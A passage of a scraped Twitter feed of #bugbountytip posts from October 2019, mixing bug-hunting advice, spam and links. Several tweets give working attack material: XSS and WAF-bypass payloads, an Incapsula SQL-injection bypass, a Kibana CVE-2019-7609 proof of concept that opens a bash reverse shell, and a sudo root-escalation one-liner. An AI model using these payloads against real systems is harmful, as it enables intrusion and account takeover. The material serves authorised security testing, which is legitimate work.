@a_l_e_r_t_1_


2019-10-26 13:06:43
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ammar Amer🇸🇾
@cry__pto


2019-10-26 10:06:16
3 free udemy courses for a limited time: -1-Master in Hacking with Metasploit: https://t.co/I25d3rBV6r -2-master object oriented php by building a web-application: https://t.co/5wJKzj2Tf0 #bugbountytip #hacking #pentest #cybersecurity #RedTeam #infosec
bugbountytip
@a_l_e_r_t_1_


2019-10-26 08:30:57
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
epxil0n
@lcblnc


2019-10-26 08:10:29
0 ClickJacking is present when these two headers are found. Access-Control-Allow-Origin: * X-Frame-Options: SAMEORIGIN #bugbountytips #bugbountytip #bugbounty
dark_warlord14
@dark_warlord14


2019-10-26 07:51:40
0 Scored my first bounty today on @Hacker0x01. Thank you @zseano @TomNomNom @brutelogic @NahamSec @s0md3v . Your work and notes have helped me to achieve this. #bugbountytip #bugbountytips https://t.co/2uJdRMwnGu
tololovejoi
@tolo7010


2019-10-26 05:36:02
0 A hacker ends his career when he stops learning new things. A company ends their bug bounty program when they stop developing new features. #bugbounty #bugbountytip
Pavandeep
@Pavandep8


2019-10-26 04:23:59
0 Look what I shared: Bypassing CORS - Saad Ahmed - Medium @MIUI| #bugbountytip #Hackers #security @infosecgirls https://t.co/Q8f8YDHFQv
Bibek Shah
@noobibek


2019-10-26 01:18:24
0 BugBounty Tip : If you see "call me" option while 2FA. Click it and check response, it might leak some sensitive info of the account. #bugbountytip #infosec
m0z
@LooseSecurity


2019-10-26 00:23:21
2 more information = more bugs #bugbountytips #BugBounty #bugbountytip
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-25 22:51:40
0 The Shortest web shell #bugbountytip #rce https://t.co/wy7H21XL1r
Salah Baddou
@chmodxxx


2019-10-25 22:48:11
0 Whoops forgot to #bugbountytip
bugbountytip
@a_l_e_r_t_1_


2019-10-25 22:27:30
0 Now 25+ download. Thank you !!! Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Ashkan
@11xuxx


2019-10-25 20:35:41
0 Trouble using aquatone? Try it like this: cat target.txt | ./aquatone -scan-timeout 500 -screenshot-timeout 300000 -http-timeout 30000 #bugbountytip
intigriti
@intigriti


2019-10-25 11:48:27
9 Sometimes, one character is all you need! Use % as a wildcard for codes, booking references or even SSN's! 🃏 Awesome #BugBountyTip, @itscachemoney! 👏 https://t.co/bDPq2uINaF
tololovejoi
@tolo7010


2019-10-25 11:14:35
1 The best tools for finding vulnerability are failure, patience, and dedication #bugbounty #bugbountytip
testter
@testter57721185


2019-10-25 09:35:27
0 #bugbountytips #bugbountytip Does knowing the ssokey of the user account constitute a security vulnerability ?
haqpl
@haqpl


2019-10-25 06:27:00
0 #bugbountytip Another trick to cause unexpected behavior of web app is to change the type of variable to an array by adding [] as a suffix to its name: ?var[]=1
lopseg
@lops3g


2019-10-25 03:04:50
0 Recently, I was looking for an XSS payload without spaces and slashes, but I didn't find one that worked. I built the below, it worked like a charm: <svg%0aonload=alert()> #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-25 02:32:29
0 Yay... Got My First Bounty of $500 From Google.... The Way HOF Started #bugbounty #bugbountytip #hacking #togetherwehitharder .. Motivated By - @_jensec @ehsahil @sehacure @logicbomb_1 https://t.co/pEosbaurZO
bugbountytip
@a_l_e_r_t_1_


2019-10-24 20:02:23
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-24 13:40:51
0 Bypass Uppercase filters like a PRO (XSS Advanced Methods) https://t.co/WSvDTsESMe #poc,#bugbountytip,#bugbounty,#hacking,#cybersecurity,#infosec
intigriti
@intigriti


2019-10-24 12:44:30
12 The best way to cause errors exposing sensitive information? ➡️Long strings in POST parameters (50.000+ characters) ➡️Using the 'Euler number' (e) in numbers to gain exponentially large values Thanks for the #BugBountyTip, @pxmme1337! https://t.co/gPJ37I6o7z
Emre Selim
@emre_selim8


2019-10-24 12:44:29
0 Does BugCrowd pay bounty for "Won't Fix" Bugs? #BugBounty #BugBountyTip #BugCrowd
Sayaan Alam
@alamsayaan


2019-10-24 09:10:40
0 Hello Infosec Community.... So Guys Let's Everyone Share Their High school percentage.....Many Newbies Will Get Idea Who Thinks that they are not doing good... #bugbounty #bugbountytip #togetherwehitharder #ethical #hacking #hackerone #bugcrowd #cybersecurity
Yadhavi
@PrincessYadhavi


2019-10-24 08:53:30
0 How to hack Rabbitmq? #bugbounty #bugbountytips #bugbountytip
Sayaan Alam
@alamsayaan


2019-10-24 07:45:30
0 It was a Nice One... #bugbounty #bugbountytips #bugbountytip #togetherwehitharder https://t.co/ZOnkntsAvW
Henry Chen
@chybeta


2019-10-24 03:45:06
3 NOTICE THIS TWEET : https://t.co/x68iNP6F7u recommended configuration for nextcloud with nginx and php-fpm is vulnerable... #bugbounty #bugbountytip #bugbountytips https://t.co/cAqptRR0Ez
Håkon Lønmo
@WriteAV


2019-10-23 17:08:48
0 Just made the @visma hall of fame for security researchers. #bugbountytip, no bounty though :-)
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:39:28
3 We always talk about methodology to find subdomains, but what about domains first ? What if you want to enlarge your scope, I use https://t.co/nTkWllAwGH https://t.co/VP7PDYC7VZ https://t.co/PfUAtO6Okp https://t.co/35MVruXUTz to find more domains owned by a company #bugbountytip
Gwendal Le Coguic
@gwendallecoguic


2019-10-23 13:05:49
1 Using @Hackerone as a recon tool. Some companies use formatted nicknames for team members/bots which is nice to find private programs you're not invited. Check the huge sitemap. #bugbountytip https://t.co/fILuM5WpDF
bugbountytip
@a_l_e_r_t_1_


2019-10-23 10:27:54
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #
Karna
@karna__1


2019-10-23 08:34:50
0 I forgot to take my laptop today and was super bored at my office. So I installed Termux (Android terminal) and started running my recon tools 😂🔥 Hit Termux if you forget your laptop! #bugbountytip #bugbountytips What other Android tools do you use @s0md3v https://t.co/fUPLoMGlk7
bugbountytip
@a_l_e_r_t_1_


2019-10-23 06:46:20
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor
Eduard Tolosa
@Edu4rdSHL


2019-10-22 20:27:50
2 Nice article explaining how to get Findomain working in Windows. It's recommended for any user that wants to use your Windows OS for security testing. #BugBounty #bugbountytip #enumeration #subdomains #recon #hacking https://t.co/PT8G1B1Gyr
Aziz Hakim
@hackerb0y_


2019-10-22 19:50:46
0 #bugbountytip Create a mind map && make your own recon list #infosec #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 18:50:53
0 Less than 1$... Learn on mobile, everywhere & Hack & earn a lot https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
bugbountytip
@a_l_e_r_t_1_


2019-10-22 17:48:56
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Murdockz
@Murdockz_CEH


2019-10-22 16:53:20
0 I earned $2,000 for my submission on @bugcrowd https://t.co/1IfbGhMzx1 #ItTakesACrowd API endpoint to create a new user account -> No Auth Token -> Created admin account with @target.com domain -> Admin Account Takeover. #bugbounty #bugbountytips #bugbountytip
Hendrik
@hendrikvb


2019-10-22 15:40:57
0 Build a custom wordlist for each dirsearch #recon, to include robots.txt, sitemap and spidered paths. #bugbountytip #BugBounty
Aashish Yadav
@aa5h15h


2019-10-22 15:34:08
2 Redis Unauthorized Access Vulnerability Simulation https://t.co/VvAv50TepM #bugbounty #bugbountytip #devops #linux #unix #windows #programmer #programming #like #retweet #followme #follow #python #php #java #redis #oscp https://t.co/m6EzTxV8G0
Luthra
@team0xL


2019-10-22 12:59:22
0 Awarded $1,000 bounty #bugbountytip Sometimes expired domain can help you to get juicy stuff. So, bruteforce the subdir on expired domain #bugbounty
bugbountytip
@a_l_e_r_t_1_


2019-10-22 10:43:58
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
Dawood Ikhlaq
@daudmalik06


2019-10-22 09:20:47
0 Found SQLI ? App is protected with incapsula waf by @Imperva ? blocking sleep keyword ? 😀 Just found the bypass of latest incapsula WAF sle%25p%28'0x12'%2b1) => sleep('ox12' + 1) write-up coming soon.. #sqli #bugbountytip @Imperva #incapsula #waf
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-22 06:25:29
1 from @EdOverflow : Thanks for the amazing #bugbountytip - https://t.co/zGwejuI2Xy
florens
@florens25301329


2019-10-21 23:25:58
0 Has anyone got any resources on XPath injection? #BugBounty #bugbountytip
Anshuman Pattnaik
@anspattnaik


2019-10-21 18:14:46
0 #bugbountytip #BugBountyTips I am trying to Smuggle an HTTP request with https://t.co/eVHtHgJ1d3 but in the response 411 status code "No Content-Length". Payload (Tried many other too) Content-Length: 5 Transfer-Encoding: cow chunked bar 0 Can you please suggest me any tips?
bugbountytip
@a_l_e_r_t_1_


2019-10-21 16:54:02
0 Less than 1$... https://t.co/fR7SA5JafD #BugBountyTip #xss #xxe #sqli #ssrf #rce #bughunting #bughunters #hackerone #bugcrowd #ruby #python #idor #manipulation
A hacker's life
@Unknownuser1806


2019-10-21 11:46:01
0 Recon resources Best article from @PentesterLand https://t.co/psZ1iens0p #bugbounty,#bugbountytip,#hacking,#infosec
Henry Chen
@chybeta


2019-10-21 11:41:06
8 writeup: ..%3B -> tomcat manager -> getshell https://t.co/ZEvOjcDhw8 #bugbounty #BugBountyTips #bugbountytip https://t.co/NBjLRgiaIt
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 10:22:03
0 #BUGBOUNTYTIP - When in Doubt , Enumerate ! Be Persistent! 🎖💸💸 💰💰💰💰 #bugbounty #bugbountytips
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:59
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/kVnk39ItNa
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:45
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/KfndxlL7zs
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:34
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/Or6ej2AaAo
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-21 09:55:21
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt Subscribe to YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #BugBountyTips #devsecops #cybersecurity #ceh #eccouncil https://t.co/0gfcgW7uTM https://t.co/le5tIA5Nqm
Imran Parray
@CreedHackers


2019-10-21 09:14:19
0 When it comes to API testing finding new endpoints is one of the important techniques that shouldn't be ignored at all. But most of the people do it wrong. Recursion techniques can be combined with endpoint extracting tools to get best out of them. #bugbountytip #cybersecurity https://t.co/ACV6BZXWt7 https://t.co/lLOhjFFPQj
Ammar Amer🇸🇾
@cry__pto


2019-10-20 15:22:12
4 free udemy courses for a limited time about : -1-hacking:https://t.co/lNIWJMNiM4 -2-malware:https://t.co/AaTAC6Av1U -3-upowork:https://t.co/FJBRRDzCnW -4-NGINX:https://t.co/XIOzfR8GWh #bugbountytip #hacking #malware #infosec #cybersecurity #PenTest #Linux
Max
@0xw2w


2019-10-20 13:15:43
1 Bug bounty tip: Always check allowed websites in CSP policy. There is a chance, that domain/bucket is not claimed or CSP pointing to file hosting. For example, I once found CSP was pointed to https://t.co/a5bttaghT7. #bugbountytip #togetherwehitharder
Saurav
@amian_saurav


2019-10-20 12:40:27
0 Finding deep level domains through simple dorking. site:*.site.com-www site:*.*.site.com-www site:*.*.*.site.com-www #BugBountyTips #BugBounty #bugbountytip
Henry Chen
@chybeta


2019-10-20 10:09:32
7 CVE-2019-7609 If you can't pop a shell via the last tweet , you can change poc like 👇 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \'bash -i>& /dev/tcp/127.0.0.1/6666 0>&1\'");//') #BugBountyTips #BugBounty #bugbountytip https://t.co/BaeSZwDbGu https://t.co/XLGHJnxT0Y
Kenan
@h1_kenan


2019-10-20 07:52:45
5 KONA #WAF #bypass #XSS #bugbountytip asd"on+<>+onpointerenter%3d"x%3dconfirm,x(cookie) enjoy 😉👍
baaay
@abaykandotcom


2019-10-20 06:32:39
0 CodeLabs took the initiative to make it easier for you who want to learn XSS by making a 'labs' where anyone can try and/or learn XSS in a basic way. #xss #BugBounty #BugBountyTips #bugbountytip https://t.co/WIMJZS6pnj https://t.co/bJNfFdJutr
Kom[S]REd
@jauharali


2019-10-20 06:23:12
0 “A Study of Security Headers — Learning Notes” by Kom[S]REd https://t.co/YRKFYCnPX1 #pentest #bugbountytip #security
Eduard Tolosa
@Edu4rdSHL


2019-10-20 01:40:23
1 Findomain 0.6.0 is out! New features: * Option to discover subdomains IPs and save to file * Option to use quiet mode to remove informative messages * Add ability to save new domains found in a TXT file while monitoring. Please RT https://t.co/tkgBfKirNP #BugBounty #bugbountytip
Sudoka
@sudo_sudoka


2019-10-19 17:32:48
0 Analysis of #CVE-2019-16278, an #unauthenticated remote code execution in the Nostromo web server, aka nhttpd, a popular open-source web server in BSD systems. All versions up to the latest release 1.9.6 are vulnerable. Path traversal to RCE! #bugbountytip https://t.co/tzL9YrLXzI
Wareeq🕸🐁
@wareeq_shile


2019-10-19 17:05:36
0 Kindly subscribe and like their content @nvisium https://t.co/z5FtAQg8YC can we get a retweet? #BugBounty #bugbountytips #bugbountytip
John mash
@Techhelplistcom


2019-10-19 17:00:01
0 I have uploaded 126 new articles as PDF files about different fields of hacking to my GitHub repository, enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/fNomAu16P2 https://t.co/3SQwGkXxII
Ammar Amer🇸🇾
@cry__pto


2019-10-19 16:12:30
11 I have uploaded 126 new articles as PDF files about different fields of hacking to my GitHub repository, enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #bugbountytip https://t.co/q2layzVpKz https://t.co/7o4QgYRMvC
Shlomie Liberow
@Shlibness


2019-10-19 13:38:21
0 Submitted an HTTP Smuggling attack and was initially rejected on low impact but found a /redirect endpoint which followed a poisoned referer header. Since I was able to set poisoned headers to an external host... #bugbountytip https://t.co/kxBCsU2Y9d
A hacker's life
@Unknownuser1806


2019-10-19 12:47:41
0 From Multiple IDORs leading to Code Execution on a different Host Container https://t.co/v519vssv7q #bugbountytips,#bugbountytip,#cybersecurity,#infosec
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-19 12:42:04
0 Finally! Reported First XSS of my life 😅 on one of the private program @Hacker0x01. The application was sanitizing alert, script, ", etc But following payload got me through! <svg/onload=prompt (1)> #bugbountytips #bugbounty #bugbountytip
Nick (or hunt4p1zza)
@ngkogkos


2019-10-19 11:35:48
0 Just ate a well-known WAF for breakfast. <form><button formaction=javascript:top['ev'+'al'](self['\x61\x74\x6f\x62'](`YWxlcnQoMSk7`));// See picture for detailed explanation and tips. #bugbounty #bugbountytip Kudos: @PortSwiggerRes, @brutelogic, @wugeej . https://t.co/4Phkolgoso
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:33:51
3 🛡 « https://t.co/ItNKqoJWJC\%3C/onscroll/=1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))%3E Try this one. ⛑ dot shot. 💣 » #BugBounty #BugBountyTip #WAF #infosec
✎ /𝒅𝒆𝒗/𝒏𝒖𝒍𝒍
@spyerror


2019-10-19 05:29:33
10 cloudflare «XSS» payload to bypass protection. 🦍 {` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´} #BugBounty #BugBountyTip #WAF #infosec
Sanketh Sharath
@sharathsanketh


2019-10-19 02:06:37
1 1st 4 1/2 months of bug bounty hunting: 1st bug-N/A 2nd -Dupe 3rd -Bounty 4th -Dupe 5th -No reply 6th -Dupe 7th -Dupe (this was a P2!) 8th -Won't fix This is tough,need to keep going! I believe tough times don't last! #bugbounty #bugbountytips #bugbountytip
Miguel Gonzales Jimenez
@z3r0cool


2019-10-19 01:39:08
1 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/FyAQ2tDzaL #bugbounty,#bugbountytip
Ishaq Mohammed
@security_prince


2019-10-18 16:15:41
0 @TheR0oT @nightwatch1337 This is one of the nicest #bugbountytip #bugbountytips for the #bugbounty hunters @Hacker0x01 @Bugcrowd @intigriti
Yadhavi
@PrincessYadhavi


2019-10-18 14:44:01
0 Any way to add custom headers to aquatone when screenshotting? #bugbounty #bugbountytips #aquatone #bugbountytip
intigriti
@intigriti


2019-10-18 11:47:03
7 Want to find 'cosmic brain' bugs, just like @0xACB and @samwcyo? 🤯 Use the following 'invisible' ranges in your payloads 👇#BugBountyTip 💥0x00 ➡️0x2F 💥0x3A ➡️0x40 💥0x5B ➡️0x60 💥0x7B ➡️0xFF https://t.co/B2WlIjEJXu
Ishaq Mohammed
@security_prince


2019-10-18 05:06:56
1 HTML5 storage manipulation (stored DOM-based) by @PortSwigger @PortSwiggerRes https://t.co/2DRcHzMwS3 #AppSec #xss #bugbountytip #bugbounty
Gopalsamy ( கோபால்சாமி )
@gopalsamy_


2019-10-18 03:19:31
0 Dear #infosec friends. Give me a suggestion, how you people are running #kalilinux tools on #ubuntu 🤗 please leave a comment below about the method that ur using :) #linux #ubuntu #bugbounty #bugbountytip #redteam #cybersecurity #hacking #hackers
A hacker's life
@Unknownuser1806


2019-10-18 02:43:25
0 Windows batch and PowerShell script that finds misconfiguration issues which can lead to privilege escalation https://t.co/sR7l2pnYH4 #bugbounty,#bugbountytip
Security Executions Code
@pwn0sec


2019-10-17 16:52:51
1 LIVE with Staf_SecurityPwn @andripwn Penetration Testing Introduction: Exploit & Reconnaissance https://t.co/EWBLAklv8D #bugbounty #bugbountytips #bugbountytip #hackerone #pwn0sec
bugbountytip
@a_l_e_r_t_1_


2019-10-17 06:00:53
0 Less than 1$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
John mash
@Techhelplistcom


2019-10-17 05:00:01
1 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/fNomAu16P2 https://t.co/R0WwN7R4Ah
Bhojpuri Chumma
@BChumma


2019-10-17 03:04:45
0 RT @cry__pto: i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytip…
👻in🐚
@0xerror


2019-10-17 02:05:13
0 XSS News: @VishnuGadupudi: 'The 7 main cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/mMIF2uJKPG, see more https://t.co/4VACxHYGGn
BlackClover
@Bc10ver


2019-10-17 02:05:12
0 Top story: @VishnuGadupudi: 'The 7 main cases of XSS thanks @brutelogic #bugbountytip #xss ' https://t.co/GJk0qJDMBC, see more https://t.co/fVnXn9Z0FJ
Ammar Amer🇸🇾
@cry__pto


2019-10-17 01:49:56
2 i have uploaded 82 new articles as a pdf files about different fields of hacking to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/PvL7gXzXKW
Nikhith
@Nikhith_


2019-10-16 19:54:37
0 I just wrote a blog post on #CVE-2019-17662 I found. This is a vulnerability I found in ThinVNC server. An arbitrary file read --> authentication bypass --> Full #VNC access. Can be helpful on a PT / Bug Bounty Read at: https://t.co/ASzbpcGwiE #InfoSec #bugbountytip
Youssef Lahouifi
@YLahouifi


2019-10-16 19:21:33
0 Use the organization field in a ssl certificate to find domain names associated with a company , you can use censys to perform such a task ... #bugbountytip #reconnaissance https://t.co/42vjFALFhq
Karna
@karna__1


2019-10-16 15:30:19
0 I'm serious. It's a #bugbountytip #bugbountytips #infosec #humans https://t.co/F7s0ZB0lFK
bugbountytip
@a_l_e_r_t_1_


2019-10-16 12:57:17
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #bughunters
bugbountytip
@a_l_e_r_t_1_


2019-10-16 10:37:51
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf
bugbountytip
@a_l_e_r_t_1_


2019-10-16 08:52:27
0 Less than 2$💪👉https://t.co/JPaA4CKmfO #BugBountyTip #xss #xxe #sqli #ssrf #ce
m0z
@LooseSecurity


2019-10-15 23:25:51
0 I get asked lots of #BugBounty questions, and one I'm always asked is "Is X valid bug" or "I reported X and it was out of scope". The answer is to read the program's scope before reporting. I know it's not always obvious, but the answer is there... #bugbountytip #bugbountytips
Vishnu Vardhan Gadupudi
@VishnuGadupudi


2019-10-15 16:04:43
1 The 7 main cases of XSS thanks @brutelogic #bugbountytip #xss https://t.co/BBtdSvmYt6
ironfist
@ironfisto


2019-10-15 15:59:35
0 Not a great tip but you might land a Cassandra cluster in the connection tab of DataStax Studio. Shodan search-> html:datastax #bugbountytip
Dhamu
@Dhamu_offensi


2019-10-15 12:56:16
7 #bugbountytip #bugbounty This is a collection of writeups, cheatsheets, videos, related to SSRF in one single location. https://t.co/ODpUpWRypc
Infected Drake
@0xInfection


2019-10-15 11:33:41
1 I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to @har1sec for the assignment. :) #infosec #bugbountytip https://t.co/BnB2fqVdTd
Random Robbie
@Random_Robbie


2019-10-15 06:35:58
2 inside a container.... limited privs? SUDO!!!! https://t.co/ocd7FodNqp sudo -u#4294967295 id uid=0(root) gid=1002(robbie) groups=1002(robbie) sudo -u#4294967295 whoami root #bugbountytip #escapethcontainer
hyperdummy
@dummyclout


2019-10-15 05:15:54
0 ping for vis. any thoughts? #bugbounty #bugbountytip
Pat.
@PuzzledPat


2019-10-15 03:22:57
0 @MacRumors, check out the year 2038 in your iPhone calendar.. notice that #Apple have given July and April some extra months. #bugbountytip https://t.co/Wrk7TEexIS
m҉4҉x҉X҉.҉!҉
@Deepak_maxx


2019-10-15 03:13:31
0 Morning Like this! #bugbounty #bugbountytip https://t.co/DsshG2nqAw
ً
@GouveaHeitor


2019-10-14 12:51:12
1 If you found a possible IDOR like: http://host/api/AccountID=123 But it is being blocked when you pass an ID from another account, try to bypass it using parameter pollution like: http://host/api/AccountId=123&AccountId=456 #bugbountytip
Ankush Goel
@0xankush


2019-10-14 06:53:27
0 If you are not automating and scripting, you are missing out on a lot of fun. It's all about time management in #bugbounty #bugbountytip
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-13 18:53:47
0 Get C|EH Certified with HackDoor Trainings Follow Us 💰💰💰💰 https://t.co/iNczOcGmCt YouTube Channel for Free Tutorials https://t.co/42lWP1DIW0 #BugBounty #BugBountyTip #bugbountytips #pentesting #cybersecurity #ceh #eccouncil #certification https://t.co/0gfcgW7uTM https://t.co/mzllE9lUqq
Ammar Amer🇸🇾
@cry__pto


2019-10-13 16:37:03
7 i have uploaded 74 new articles as a pdf files about different fields of hacking+ linux,cybersecurity,,,etc. to my github repository enjoy! #bugbountytips #pentest #redteam #OSINT #Malware #cybersecurity #hacking #infosec #linux #oscp #bugbountytip https://t.co/q2layzVpKz https://t.co/XE81lBik5M
Garth Humphreys
@garthhumphreys


2019-10-13 16:16:36
0 #Random thought: Is it #dups or #dupes ? #BugBounty #bugbountytip #infosec
Security Executions Code
@pwn0sec


2019-10-13 15:38:36
0 Bug Bounty ATT : Server-Side Request Forgery (SSRF) https://t.co/hjQLeWxwIS #bugbounty #bugbountytip #bugbountytips #ssrf #hackerone #att
ahamed morad
@Modam3r5


2019-10-13 15:06:47
2 this is one of my reports that I think let me win by the invitation. #bugbountytip https://t.co/fCcnzDat6I
Harsh kumar
@Harshku21974218


2019-10-13 12:37:58
1 Bypassing the WebARX Web Application Firewall (WAF) https://t.co/n09E8OhI2K #cybersecurity #bugbountytip
Evan Custodio
@defparam


2019-10-13 03:02:20
0 By using the boundary "SmuggleThis"+colon I could end the dangling part anywhere in the headers (could be handy). When I went to go check and see if "test.txt" was written to the server I was happy to see I had smuggled my own request and found the CDN headers. #bugbountytip https://t.co/BxYMvBYlsB
ghostlulz
@ghostlulz1337


2019-10-13 02:11:51
0 You know you can turn that SSRF finding into something with devastating impact right? The AWS metadata REST API can be used to steal credentials via SSRF. More information on my blog: https://t.co/2DgWQ2LJkp #infosec #bugbountytips #osint #redteam #aws #bugbountytip #ssrf #hack https://t.co/CCpKLNnF1m
Ashraf
@m0rph1n3e


2019-10-13 01:04:21
0 SPENDING HOURS TESTING MY TARGET FOR CLIENT SIDE VULNERABILITIES, I AM STUCK AT THIS POINT. ANY ADVICE? METHODOLOGY? #bugbounty #bugbountytip #bugbountytips #infosec #xss #ssti #rce #hackerone
Andri Wahyudi 📂
@andripwn


2019-10-12 22:03:00
1 admin live now #bugbounty #bugbountytip https://t.co/VEXedERrSN
Ammar Amer🇸🇾
@cry__pto


2019-10-12 19:33:37
1 Automatic screenshot tools, used to take screenshots of a large list of targets to extract useful info like errors that may lead to vulnerabilities -1-EyeWitness: https://t.co/7kbFXmViog -2-HTTPScreenShot: https://t.co/93SafaL5kg -3-Gowitness: https://t.co/YW8bdd75MW #bugbountytip
Rohit Kumar (@rohitcoder)
@rohitcoder


2019-10-12 09:30:44
0 https://t.co/KGbg9IYk2W Bounty: $$$ Thanks to facebook and other programs they're helping me to carry out my startup with these funds. This BugBounty life really helped me alot. #BugBountyTip #BugBounty #Facebook #FacebookBugBounty #Hacker0x01 #EthicalHacking #Hacking
FS
@fsec__


2019-10-12 01:56:49
0 Terminal tips #bugbountytips #bugbountytip #bugbounty https://t.co/dMR3wWBW9c
hacks2learn
@hacks2learn


2019-10-12 00:48:14
0 #ProTip when dropping XSS payloads into a complex dynamic application use breadcrumbs to retrace your steps. I spent 60+ mins trying to find where my hidden pop-up came from... instead use tests like alert("Home->Settings->Profile->Background->Image->NAME_field") #bugbountytip
Garth Humphreys
@garthhumphreys


2019-10-11 20:59:04
0 Gained admin access! #BugBounty #bugbountytip #bugbounties #infosec #appsec #writeup https://t.co/tOKQkuzHax
kaustubh padwad
@s3curityb3ast


2019-10-11 20:46:37
0 One of the best parts of @SynackRedTeam is their missions. I rarely got a chance to grab one. But they are quick, they pay, and knowledge is a bonus from it #bugbounty #bugbountytip #synack https://t.co/kBptrSMaam
Mourad
@SecuAudit


2019-10-11 16:04:53
0 Livechat is the most vulnerable part of a website, you have an 85% chance to find an XSS or IDOR there; if your favorite Bug Bounty program has livechat support, start pentesting it. #bugbountytip #bugbountytips #BugBounty https://t.co/LSwH3IZwY4
Somdev Sangwan
@s0md3v


2019-10-11 12:44:42
1 I performed a little experiment on bug hunters and as it turns out, lot of them are....curious hackers. Tweet 1's statistics are for 12 minutes and Tweet 2's statistics are for 5 minutes. Dear marketers, if you add #bugbountytip, these people will even read food recipes. https://t.co/s6vSo7Yra2
€𝔵𝔭𝔩𝔬𝔦𝔱𝔠0𝔡𝔢𝔯
@vanshitmalhotra


2019-10-11 10:09:48
